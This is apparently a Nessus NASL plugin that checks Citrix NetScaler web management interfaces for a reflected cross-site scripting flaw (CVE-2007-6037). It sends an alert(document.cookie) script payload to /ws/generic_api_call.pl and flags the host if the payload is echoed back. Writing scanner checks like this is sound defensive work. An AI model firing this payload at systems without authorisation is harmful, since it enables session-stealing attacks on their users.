# netscaler_web_xss.nasl
# GPLv2
#
# History:
#
# 1.00, 11/21/07
# - Initial release
# kst-depend-rpc


    desc["english"]="
Synopsis :

The remote web server is prone to cross-site scripting attacks. 

Description :

The remote Citrix NetScaler web management interface is susceptible to
cross-site scripting attacks. 

See also :

http://www.securityfocus.com/archive/1/483920/100/0/threaded

Solution :

Unknown at this time.

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";


if (description)
    {
    script_id(80027);
    script_version("$Revision: 1.4 $");
    name["english"]="NetScaler web management XSS";
    summary["english"]="Attempts XSS against NetScaler web management interface";
    family["english"]="CGI abuses : XSS";
    script_name(english:name["english"]);
    script_description(english:desc["english"]);
    script_summary(english:summary["english"]);
    script_family(english:family["english"]);
    script_category(ACT_ATTACK);
    script_cve_id("CVE-2007-6037");
    script_bugtraq_id(26491);
    script_xref(name:"OSVDB", value:"39009");
    script_copyright(english:"This script is Copyright (c) 2007 nnposter");
    script_dependencies("netscaler_web_login.nasl");
    script_require_keys("www/netscaler");
    script_require_ports("Services/www",80);
    exit(0);
    }


if (!get_kb_item("www/netscaler")) exit(0);


include("url_func.inc");
include("http_func.inc");
include("http_keepalive.inc");


port=get_http_port(default:80);
if (!get_tcp_port_state(port) || !get_kb_item("www/netscaler/"+port))
    exit(0);

xss="</script><script>alert(document.cookie)</script><script>";
url="/ws/generic_api_call.pl?function=statns&standalone="+urlencode(str:xss);

resp=http_keepalive_send_recv(port:port,
                              data:http_get(item:url,port:port),
                              embedded:TRUE);
if (!resp || xss>!<resp) exit(0);

report = string(
    desc["english"],
    "\n\n",
    "Plugin output :\n",
    "\n",
    "The following URLs have been found vulnerable :\n",
    "\n",
    ereg_replace(string:url,pattern:"\?.*$",replace:"")

);
security_warning(port:port,data:report);
set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
